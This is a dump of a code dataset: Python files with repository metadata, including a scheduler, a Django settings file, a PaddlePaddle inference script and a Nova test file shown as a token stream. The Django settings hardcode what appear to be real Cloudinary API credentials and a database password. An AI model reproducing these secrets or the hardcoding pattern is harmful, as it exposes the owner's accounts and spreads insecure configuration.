| Column | Type | Min | Max |
|---|---|---|---|
| blob_id | stringlengths | 40 | 40 |
| directory_id | stringlengths | 40 | 40 |
| path | stringlengths | 3 | 616 |
| content_id | stringlengths | 40 | 40 |
| detected_licenses | sequencelengths | 0 | 112 |
| license_type | stringclasses (2 values) | | |
| repo_name | stringlengths | 5 | 115 |
| snapshot_id | stringlengths | 40 | 40 |
| revision_id | stringlengths | 40 | 40 |
| branch_name | stringclasses (777 values) | | |
| visit_date | timestamp[us] | 2015-08-06 10:31:46 | 2023-09-06 10:44:38 |
| revision_date | timestamp[us] | 1970-01-01 02:38:32 | 2037-05-03 13:00:00 |
| committer_date | timestamp[us] | 1970-01-01 02:38:32 | 2023-09-06 01:08:06 |
| github_id | int64 (nullable ⌀) | 4.92k | 681M |
| star_events_count | int64 | 0 | 209k |
| fork_events_count | int64 | 0 | 110k |
| gha_license_id | stringclasses (22 values) | | |
| gha_event_created_at | timestamp[us] (nullable ⌀) | 2012-06-04 01:52:49 | 2023-09-14 21:59:50 |
| gha_created_at | timestamp[us] (nullable ⌀) | 2008-05-22 07:58:19 | 2023-08-21 12:35:19 |
| gha_language | stringclasses (149 values) | | |
| src_encoding | stringclasses (26 values) | | |
| language | stringclasses (1 value) | | |
| is_vendor | bool (2 classes) | | |
| is_generated | bool (2 classes) | | |
| length_bytes | int64 | 3 | 10.2M |
| extension | stringclasses (188 values) | | |
| content | stringlengths | 3 | 10.2M |
| authors | sequencelengths | 1 | 1 |
| author_id | stringlengths | 1 | 132 |
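The records below follow this schema: each one is shown flattened, with the metadata fields listed above, then the file `content`, then `authors`. If this dump mirrors a Hugging Face dataset with the same schema, records could be streamed with the `datasets` library; a minimal sketch, where the dataset path `org/code-dataset` is a placeholder and not taken from this document:

```python
# Minimal sketch of reading records with this schema via the `datasets` library.
# "org/code-dataset" is a placeholder name, not part of the original document.
from datasets import load_dataset

ds = load_dataset("org/code-dataset", split="train", streaming=True)
for record in ds.take(3):
    # Field names follow the schema table above.
    print(record["repo_name"], record["path"], record["length_bytes"])
```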
9373c0cd05fa128d62a95b63054c5a5f5d3ec8dc | 97426aa614cd9e07d53dd761b55472389a3ebd60 | /python/scripts/marketsim/scheduler.py | e4bb7eb635eb6e453927fdca5173fbb21bee0838 | [] | no_license | antonkolotaev/v2 | e30a12ea710848838d85ee0b6bbd9224e40602d2 | db64cd78577cebb366d0b3d849fdfbe694b97f94 | refs/heads/master | 2020-12-24T14:35:59.486012 | 2012-08-16T08:24:13 | 2012-08-16T08:24:13 | 10,887,220 | 1 | 6 | null | null | null | null | UTF-8 | Python | false | false | 1,665 | py | import heapq
class _EventHandler(object):
    # Wraps a handler so that a scheduled event can be cancelled after the fact.
    def __init__(self, handler):
        self._handler = handler
        self._cancelled = False

    def __call__(self):
        self._handler()

    def cancel(self):
        self._cancelled = True

    @property
    def cancelled(self):
        return self._cancelled

    def __repr__(self):
        return "(" + repr(self._handler) + ("-> Cancelled" if self.cancelled else "") + ")"

class Scheduler(object):
    # Discrete-event scheduler backed by a min-heap of (actionTime, handler) pairs.
    def __init__(self):
        self.reset()

    def reset(self):
        self._elements = []
        self._currentTime = 0.

    def __repr__(self):
        return "(t=" + str(self.currentTime) + ": " + repr(self._elements) + ")"

    @property
    def currentTime(self):
        return self._currentTime

    def schedule(self, actionTime, handler):
        assert actionTime >= self.currentTime
        eh = _EventHandler(handler)
        event = (actionTime, eh)
        heapq.heappush(self._elements, event)
        return eh.cancel

    def scheduleAfter(self, dt, handler):
        self.schedule(self.currentTime + dt, handler)

    def workTill(self, limitTime):
        while self._elements != [] and self._elements[0][0] < limitTime:
            (actionTime, eh) = heapq.heappop(self._elements)
            if not eh.cancelled:
                self._currentTime = actionTime
                eh()
        self._currentTime = limitTime

    def advance(self, dt):
        self.workTill(self.currentTime + dt)

    def process(self, intervalFunc, handler):
        # Re-schedules the handler indefinitely, at intervals drawn from intervalFunc().
        def h():
            handler()
            self.scheduleAfter(intervalFunc(), h)
        self.scheduleAfter(intervalFunc(), h)

world = Scheduler() | [
"[email protected]"
] | |
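A minimal usage sketch for the `Scheduler` in the record above; the times, messages, and the `say` helper are made up for illustration and are not part of the original file:

```python
# Hypothetical usage of the Scheduler/_EventHandler pair from the record above.
def say(msg):
    def _handler():
        print(msg)
    return _handler

s = Scheduler()
s.schedule(5.0, say("event at t=5"))
cancel = s.schedule(7.0, say("never fires"))
cancel()                        # cancelled events are skipped when popped
s.scheduleAfter(2.5, say("event at t=2.5"))
s.workTill(10.0)                # fires events with time < 10, then sets currentTime to 10
```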
90e2fd31f15d3ba613a447de0e0f4bb4e370a085 | c67dc92dd0c4dc7661b9185ae7487abf086d4dc6 | /appraisalproject/settings.py | 4130eeb0d62b3e1e7b6a41d0a38d16ffe9f025bf | [
"MIT"
] | permissive | felkiriinya/Quality-Appraisal | 1f14339eddaad256994501ab2aa5e1a128b16478 | 5b9e114d96816a9d146eca7646330da7d273b6ef | refs/heads/master | 2023-01-22T22:31:30.052977 | 2020-12-09T14:13:41 | 2020-12-09T14:13:41 | 319,227,932 | 2 | 0 | MIT | 2020-12-08T18:46:21 | 2020-12-07T06:43:12 | HTML | UTF-8 | Python | false | false | 4,515 | py | """
Django settings for appraisalproject project.
Generated by 'django-admin startproject' using Django 3.1.3.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
import os
from pathlib import Path
import cloudinary
import cloudinary.api
import cloudinary.uploader
import django_heroku
import dj_database_url
from decouple import config,Csv
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
MODE=config("MODE", default="dev")
SECRET_KEY = config('SECRET_KEY')
DEBUG = config('DEBUG', default=False, cast=bool)
# development
if config('MODE')=="dev":
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': config('DB_NAME'),
'USER': config('DB_USER'),
'PASSWORD': config('DB_PASSWORD'),
'HOST': config('DB_HOST'),
'PORT': '',
}
}
# production
else:
DATABASES = {
'default': dj_database_url.config(
default=config('DATABASE_URL')
)
}
db_from_env = dj_database_url.config(conn_max_age=500)
DATABASES['default'].update(db_from_env)
ALLOWED_HOSTS = config('ALLOWED_HOSTS', cast=Csv())
# Application definition
INSTALLED_APPS = [
'bootstrap3',
'appraisalapp.apps.AppraisalappConfig',
'cloudinary',
'crispy_forms',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'whitenoise.middleware.WhiteNoiseMiddleware',
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'appraisalproject.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'appraisalproject.wsgi.application'
cloudinary.config(
cloud_name = "duhceor4r",
api_key = "988552584751394",
api_secret = "grnCc_TFy5WFWteERzMJRj3t88k"
)
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'NAME': 'appraisal',
'USER': 'felista',
'PASSWORD':'ilovemyself',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Africa/Nairobi'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
STATICFILES_DIRS = [
os.path.join(BASE_DIR, "static"),
]
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
AUTH_PROFILE_MODULE = 'accounts.Profile'
LOGOUT_REDIRECT_URL='/logout/'
LOGIN_REDIRECT_URL='/'
django_heroku.settings(locals()) | [
"[email protected]"
] | |
dc8e427f0f9960b214b3229a6aad8301ef411940 | e6ab424564e3d651ca2533ad7078dcd9c677d3b1 | /tutorial-reference/Day 23/raw_input.py | 289f09e2cc0cd7a886a1a9068d76b1906f432bd2 | [
"MIT"
] | permissive | fineanmol/30-Days-of-Python | cd274c155d811a0d865dbe790f3d998626e45cae | e4b7b6272febf05ca7fc73652f141ca355e638f8 | refs/heads/master | 2022-10-16T07:07:14.889425 | 2022-10-01T21:47:33 | 2022-10-01T21:47:33 | 151,871,847 | 4 | 1 | MIT | 2022-10-01T21:47:34 | 2018-10-06T18:54:29 | HTML | UTF-8 | Python | false | false | 122 | py |
from getpass import getpass
name = input("What's your name?\n")
pw = getpass("What's your password?\n")
print(name, pw)
| [
"[email protected]"
] | |
f2f8d6a4696af48a294dd7a3760a76943e0fa51a | e3fe234510d19c120d56f9a2876b7d508d306212 | /16paddle/dssm_lm_rank/infer.py | 46aade009862bd1903c9ce6ade3cb0918b75bd60 | [
"Apache-2.0"
] | permissive | KEVINYZY/python-tutorial | 78b348fb2fa2eb1c8c55d016affb6a9534332997 | ae43536908eb8af56c34865f52a6e8644edc4fa3 | refs/heads/master | 2020-03-30T02:11:03.394073 | 2019-12-03T00:52:10 | 2019-12-03T00:52:10 | 150,617,875 | 0 | 0 | Apache-2.0 | 2018-09-27T16:39:29 | 2018-09-27T16:39:28 | null | UTF-8 | Python | false | false | 2,827 | py | # -*- coding: utf-8 -*-
# Author: XuMing <[email protected]>
# Data: 17/10/18
# Brief: 预测
import os
import sys
import paddle.v2 as paddle
import config
import reader
from network import dssm_lm
from utils import logger, load_dict, load_reverse_dict
def infer(model_path, dic_path, infer_path, prediction_output_path, rnn_type="gru", batch_size=1):
logger.info("begin to predict...")
# check files
assert os.path.exists(model_path), "trained model not exits."
assert os.path.exists(dic_path), " word dictionary file not exist."
assert os.path.exists(infer_path), "infer file not exist."
logger.info("load word dictionary.")
word_dict = load_dict(dic_path)
word_reverse_dict = load_reverse_dict(dic_path)
logger.info("dictionary size = %d" % (len(word_dict)))
try:
word_dict["<unk>"]
except KeyError:
logger.fatal("the word dictionary must contain <unk> token.")
sys.exit(-1)
# initialize PaddlePaddle
paddle.init(use_gpu=config.use_gpu, trainer_count=config.num_workers)
# load parameter
logger.info("load model parameters from %s " % model_path)
parameters = paddle.parameters.Parameters.from_tar(
open(model_path, "r"))
# load the trained model
prediction = dssm_lm(
vocab_sizes=[len(word_dict), len(word_dict)],
emb_dim=config.emb_dim,
hidden_size=config.hidden_size,
stacked_rnn_num=config.stacked_rnn_num,
rnn_type=rnn_type,
share_semantic_generator=config.share_semantic_generator,
share_embed=config.share_embed,
is_infer=True)
inferer = paddle.inference.Inference(
output_layer=prediction, parameters=parameters)
feeding = {"left_input": 0, "left_target": 1, "right_input": 2, "right_target": 3}
logger.info("infer data...")
# define reader
reader_args = {
"file_path": infer_path,
"word_dict": word_dict,
"is_infer": True,
}
infer_reader = paddle.batch(reader.rnn_reader(**reader_args), batch_size=batch_size)
logger.warning("output prediction to %s" % prediction_output_path)
with open(prediction_output_path, "w")as f:
for id, item in enumerate(infer_reader()):
left_text = " ".join([word_reverse_dict[id] for id in item[0][0]])
right_text = " ".join([word_reverse_dict[id] for id in item[0][2]])
probs = inferer.infer(input=item, field=["value"], feeding=feeding)
f.write("%f\t%f\t%s\t%s" % (probs[0], probs[1], left_text, right_text))
f.write("\n")
if __name__ == "__main__":
infer(model_path=config.model_path,
dic_path=config.dic_path,
infer_path=config.infer_path,
prediction_output_path=config.prediction_output_path,
rnn_type=config.rnn_type)
| [
"[email protected]"
] | |
84af5643294405a7ff2847ab15b144cbe2e0b180 | 781e2692049e87a4256320c76e82a19be257a05d | /all_data/exercism_data/python/leap/54a77e4df04741779d39c341ac4e009d.py | 3f2016251f8855d98df3f0166caff580674caeeb | [] | no_license | itsolutionscorp/AutoStyle-Clustering | 54bde86fe6dbad35b568b38cfcb14c5ffaab51b0 | be0e2f635a7558f56c61bc0b36c6146b01d1e6e6 | refs/heads/master | 2020-12-11T07:27:19.291038 | 2016-03-16T03:18:00 | 2016-03-16T03:18:42 | 59,454,921 | 4 | 0 | null | 2016-05-23T05:40:56 | 2016-05-23T05:40:56 | null | UTF-8 | Python | false | false | 90 | py | def is_leap_year(year):
    return bool((not year % 4 and year % 100) or not year % 400)
| [
"[email protected]"
] | |
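A few spot checks of the rule above (a year is a leap year when it is divisible by 4 and not by 100, or when it is divisible by 400):

```python
# Sanity checks for is_leap_year from the record above.
assert is_leap_year(1996) is True    # divisible by 4, not a century year
assert is_leap_year(1900) is False   # century year not divisible by 400
assert is_leap_year(2000) is True    # divisible by 400
```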
6f115c7096d8ae1c99f1016d22ed8d128fa46b32 | 75d8667735782cd1d0eb4877e52c89da5cd92dde | /nova/tests/unit/virt/vmwareapi/test_vif.py | 5b4fb19c12b3b518d45107c750fd29f41ecc21e7 | [
"Apache-2.0"
] | permissive | bopopescu/nova-token | ffecfd3ec561936b7d9d7e691bc57383cde05436 | ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2 | refs/heads/master | 2022-11-22T09:53:31.073483 | 2016-05-14T02:47:01 | 2016-05-15T22:02:55 | 282,105,621 | 0 | 0 | Apache-2.0 | 2020-07-24T02:42:19 | 2020-07-24T02:42:18 | null | UTF-8 | Python | false | false | 31,662 | py | begin_unit
comment|'# Copyright 2013 Canonical Corp.'
nl|'\n'
comment|'# All Rights Reserved.'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# Licensed under the Apache License, Version 2.0 (the "License"); you may'
nl|'\n'
comment|'# not use this file except in compliance with the License. You may obtain'
nl|'\n'
comment|'# a copy of the License at'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# http://www.apache.org/licenses/LICENSE-2.0'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# Unless required by applicable law or agreed to in writing, software'
nl|'\n'
comment|'# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT'
nl|'\n'
comment|'# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the'
nl|'\n'
comment|'# License for the specific language governing permissions and limitations'
nl|'\n'
comment|'# under the License.'
nl|'\n'
nl|'\n'
name|'import'
name|'mock'
newline|'\n'
name|'from'
name|'oslo_vmware'
name|'import'
name|'exceptions'
name|'as'
name|'vexc'
newline|'\n'
name|'from'
name|'oslo_vmware'
name|'import'
name|'vim_util'
newline|'\n'
nl|'\n'
name|'from'
name|'nova'
name|'import'
name|'exception'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'network'
name|'import'
name|'model'
name|'as'
name|'network_model'
newline|'\n'
name|'from'
name|'nova'
name|'import'
name|'test'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'tests'
op|'.'
name|'unit'
name|'import'
name|'matchers'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'tests'
op|'.'
name|'unit'
name|'import'
name|'utils'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'tests'
op|'.'
name|'unit'
op|'.'
name|'virt'
op|'.'
name|'vmwareapi'
name|'import'
name|'fake'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'virt'
op|'.'
name|'vmwareapi'
name|'import'
name|'constants'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'virt'
op|'.'
name|'vmwareapi'
name|'import'
name|'network_util'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'virt'
op|'.'
name|'vmwareapi'
name|'import'
name|'vif'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'virt'
op|'.'
name|'vmwareapi'
name|'import'
name|'vm_util'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|VMwareVifTestCase
name|'class'
name|'VMwareVifTestCase'
op|'('
name|'test'
op|'.'
name|'NoDBTestCase'
op|')'
op|':'
newline|'\n'
DECL|member|setUp
indent|' '
name|'def'
name|'setUp'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'super'
op|'('
name|'VMwareVifTestCase'
op|','
name|'self'
op|')'
op|'.'
name|'setUp'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'flags'
op|'('
name|'vlan_interface'
op|'='
string|"'vmnet0'"
op|','
name|'group'
op|'='
string|"'vmware'"
op|')'
newline|'\n'
name|'network'
op|'='
name|'network_model'
op|'.'
name|'Network'
op|'('
name|'id'
op|'='
number|'0'
op|','
nl|'\n'
name|'bridge'
op|'='
string|"'fa0'"
op|','
nl|'\n'
name|'label'
op|'='
string|"'fake'"
op|','
nl|'\n'
name|'vlan'
op|'='
number|'3'
op|','
nl|'\n'
name|'bridge_interface'
op|'='
string|"'eth0'"
op|','
nl|'\n'
name|'injected'
op|'='
name|'True'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'_network'
op|'='
name|'network'
newline|'\n'
name|'self'
op|'.'
name|'vif'
op|'='
name|'network_model'
op|'.'
name|'NetworkInfo'
op|'('
op|'['
nl|'\n'
name|'network_model'
op|'.'
name|'VIF'
op|'('
name|'id'
op|'='
name|'None'
op|','
nl|'\n'
name|'address'
op|'='
string|"'DE:AD:BE:EF:00:00'"
op|','
nl|'\n'
name|'network'
op|'='
name|'network'
op|','
nl|'\n'
name|'type'
op|'='
name|'None'
op|','
nl|'\n'
name|'devname'
op|'='
name|'None'
op|','
nl|'\n'
name|'ovs_interfaceid'
op|'='
name|'None'
op|','
nl|'\n'
name|'rxtx_cap'
op|'='
number|'3'
op|')'
nl|'\n'
op|']'
op|')'
op|'['
number|'0'
op|']'
newline|'\n'
name|'self'
op|'.'
name|'session'
op|'='
name|'fake'
op|'.'
name|'FakeSession'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'cluster'
op|'='
name|'None'
newline|'\n'
nl|'\n'
DECL|member|tearDown
dedent|''
name|'def'
name|'tearDown'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'super'
op|'('
name|'VMwareVifTestCase'
op|','
name|'self'
op|')'
op|'.'
name|'tearDown'
op|'('
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_ensure_vlan_bridge
dedent|''
name|'def'
name|'test_ensure_vlan_bridge'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'mox'
op|'.'
name|'StubOutWithMock'
op|'('
name|'network_util'
op|','
string|"'get_network_with_the_name'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'StubOutWithMock'
op|'('
name|'network_util'
op|','
nl|'\n'
string|"'get_vswitch_for_vlan_interface'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'StubOutWithMock'
op|'('
name|'network_util'
op|','
nl|'\n'
string|"'check_if_vlan_interface_exists'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'StubOutWithMock'
op|'('
name|'network_util'
op|','
string|"'create_port_group'"
op|')'
newline|'\n'
name|'network_util'
op|'.'
name|'get_network_with_the_name'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'fa0'"
op|','
nl|'\n'
name|'self'
op|'.'
name|'cluster'
op|')'
op|'.'
name|'AndReturn'
op|'('
name|'None'
op|')'
newline|'\n'
name|'network_util'
op|'.'
name|'get_vswitch_for_vlan_interface'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'vmnet0'"
op|','
nl|'\n'
name|'self'
op|'.'
name|'cluster'
op|')'
op|'.'
name|'AndReturn'
op|'('
string|"'vmnet0'"
op|')'
newline|'\n'
name|'network_util'
op|'.'
name|'check_if_vlan_interface_exists'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'vmnet0'"
op|','
nl|'\n'
name|'self'
op|'.'
name|'cluster'
op|')'
op|'.'
name|'AndReturn'
op|'('
name|'True'
op|')'
newline|'\n'
name|'network_util'
op|'.'
name|'create_port_group'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'fa0'"
op|','
string|"'vmnet0'"
op|','
number|'3'
op|','
nl|'\n'
name|'self'
op|'.'
name|'cluster'
op|')'
newline|'\n'
name|'network_util'
op|'.'
name|'get_network_with_the_name'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'fa0'"
op|','
name|'None'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'ReplayAll'
op|'('
op|')'
newline|'\n'
name|'vif'
op|'.'
name|'ensure_vlan_bridge'
op|'('
name|'self'
op|'.'
name|'session'
op|','
name|'self'
op|'.'
name|'vif'
op|','
name|'create_vlan'
op|'='
name|'True'
op|')'
newline|'\n'
nl|'\n'
comment|"# FlatDHCP network mode without vlan - network doesn't exist with the host"
nl|'\n'
DECL|member|test_ensure_vlan_bridge_without_vlan
dedent|''
name|'def'
name|'test_ensure_vlan_bridge_without_vlan'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'mox'
op|'.'
name|'StubOutWithMock'
op|'('
name|'network_util'
op|','
string|"'get_network_with_the_name'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'StubOutWithMock'
op|'('
name|'network_util'
op|','
nl|'\n'
string|"'get_vswitch_for_vlan_interface'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'StubOutWithMock'
op|'('
name|'network_util'
op|','
nl|'\n'
string|"'check_if_vlan_interface_exists'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'StubOutWithMock'
op|'('
name|'network_util'
op|','
string|"'create_port_group'"
op|')'
newline|'\n'
nl|'\n'
name|'network_util'
op|'.'
name|'get_network_with_the_name'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'fa0'"
op|','
nl|'\n'
name|'self'
op|'.'
name|'cluster'
op|')'
op|'.'
name|'AndReturn'
op|'('
name|'None'
op|')'
newline|'\n'
name|'network_util'
op|'.'
name|'get_vswitch_for_vlan_interface'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'vmnet0'"
op|','
nl|'\n'
name|'self'
op|'.'
name|'cluster'
op|')'
op|'.'
name|'AndReturn'
op|'('
string|"'vmnet0'"
op|')'
newline|'\n'
name|'network_util'
op|'.'
name|'check_if_vlan_interface_exists'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'vmnet0'"
op|','
nl|'\n'
name|'self'
op|'.'
name|'cluster'
op|')'
op|'.'
name|'AndReturn'
op|'('
name|'True'
op|')'
newline|'\n'
name|'network_util'
op|'.'
name|'create_port_group'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'fa0'"
op|','
string|"'vmnet0'"
op|','
number|'0'
op|','
nl|'\n'
name|'self'
op|'.'
name|'cluster'
op|')'
newline|'\n'
name|'network_util'
op|'.'
name|'get_network_with_the_name'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'fa0'"
op|','
name|'None'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'ReplayAll'
op|'('
op|')'
newline|'\n'
name|'vif'
op|'.'
name|'ensure_vlan_bridge'
op|'('
name|'self'
op|'.'
name|'session'
op|','
name|'self'
op|'.'
name|'vif'
op|','
name|'create_vlan'
op|'='
name|'False'
op|')'
newline|'\n'
nl|'\n'
comment|'# FlatDHCP network mode without vlan - network exists with the host'
nl|'\n'
comment|'# Get vswitch and check vlan interface should not be called'
nl|'\n'
DECL|member|test_ensure_vlan_bridge_with_network
dedent|''
name|'def'
name|'test_ensure_vlan_bridge_with_network'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'mox'
op|'.'
name|'StubOutWithMock'
op|'('
name|'network_util'
op|','
string|"'get_network_with_the_name'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'StubOutWithMock'
op|'('
name|'network_util'
op|','
nl|'\n'
string|"'get_vswitch_for_vlan_interface'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'StubOutWithMock'
op|'('
name|'network_util'
op|','
nl|'\n'
string|"'check_if_vlan_interface_exists'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'StubOutWithMock'
op|'('
name|'network_util'
op|','
string|"'create_port_group'"
op|')'
newline|'\n'
name|'vm_network'
op|'='
op|'{'
string|"'name'"
op|':'
string|"'VM Network'"
op|','
string|"'type'"
op|':'
string|"'Network'"
op|'}'
newline|'\n'
name|'network_util'
op|'.'
name|'get_network_with_the_name'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'fa0'"
op|','
nl|'\n'
name|'self'
op|'.'
name|'cluster'
op|')'
op|'.'
name|'AndReturn'
op|'('
name|'vm_network'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'ReplayAll'
op|'('
op|')'
newline|'\n'
name|'vif'
op|'.'
name|'ensure_vlan_bridge'
op|'('
name|'self'
op|'.'
name|'session'
op|','
name|'self'
op|'.'
name|'vif'
op|','
name|'create_vlan'
op|'='
name|'False'
op|')'
newline|'\n'
nl|'\n'
comment|'# Flat network mode with DVS'
nl|'\n'
DECL|member|test_ensure_vlan_bridge_with_existing_dvs
dedent|''
name|'def'
name|'test_ensure_vlan_bridge_with_existing_dvs'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'network_ref'
op|'='
op|'{'
string|"'dvpg'"
op|':'
string|"'dvportgroup-2062'"
op|','
nl|'\n'
string|"'type'"
op|':'
string|"'DistributedVirtualPortgroup'"
op|'}'
newline|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'StubOutWithMock'
op|'('
name|'network_util'
op|','
string|"'get_network_with_the_name'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'StubOutWithMock'
op|'('
name|'network_util'
op|','
nl|'\n'
string|"'get_vswitch_for_vlan_interface'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'StubOutWithMock'
op|'('
name|'network_util'
op|','
nl|'\n'
string|"'check_if_vlan_interface_exists'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'StubOutWithMock'
op|'('
name|'network_util'
op|','
string|"'create_port_group'"
op|')'
newline|'\n'
nl|'\n'
name|'network_util'
op|'.'
name|'get_network_with_the_name'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'fa0'"
op|','
nl|'\n'
name|'self'
op|'.'
name|'cluster'
op|')'
op|'.'
name|'AndReturn'
op|'('
name|'network_ref'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'ReplayAll'
op|'('
op|')'
newline|'\n'
name|'ref'
op|'='
name|'vif'
op|'.'
name|'ensure_vlan_bridge'
op|'('
name|'self'
op|'.'
name|'session'
op|','
nl|'\n'
name|'self'
op|'.'
name|'vif'
op|','
nl|'\n'
name|'create_vlan'
op|'='
name|'False'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertThat'
op|'('
name|'ref'
op|','
name|'matchers'
op|'.'
name|'DictMatches'
op|'('
name|'network_ref'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_network_ref_flat_dhcp
dedent|''
name|'def'
name|'test_get_network_ref_flat_dhcp'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'mox'
op|'.'
name|'StubOutWithMock'
op|'('
name|'vif'
op|','
string|"'ensure_vlan_bridge'"
op|')'
newline|'\n'
name|'vif'
op|'.'
name|'ensure_vlan_bridge'
op|'('
name|'self'
op|'.'
name|'session'
op|','
name|'self'
op|'.'
name|'vif'
op|','
name|'cluster'
op|'='
name|'self'
op|'.'
name|'cluster'
op|','
nl|'\n'
name|'create_vlan'
op|'='
name|'False'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'ReplayAll'
op|'('
op|')'
newline|'\n'
name|'vif'
op|'.'
name|'get_network_ref'
op|'('
name|'self'
op|'.'
name|'session'
op|','
name|'self'
op|'.'
name|'cluster'
op|','
name|'self'
op|'.'
name|'vif'
op|','
name|'False'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_network_ref_bridge
dedent|''
name|'def'
name|'test_get_network_ref_bridge'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'mox'
op|'.'
name|'StubOutWithMock'
op|'('
name|'vif'
op|','
string|"'ensure_vlan_bridge'"
op|')'
newline|'\n'
name|'vif'
op|'.'
name|'ensure_vlan_bridge'
op|'('
name|'self'
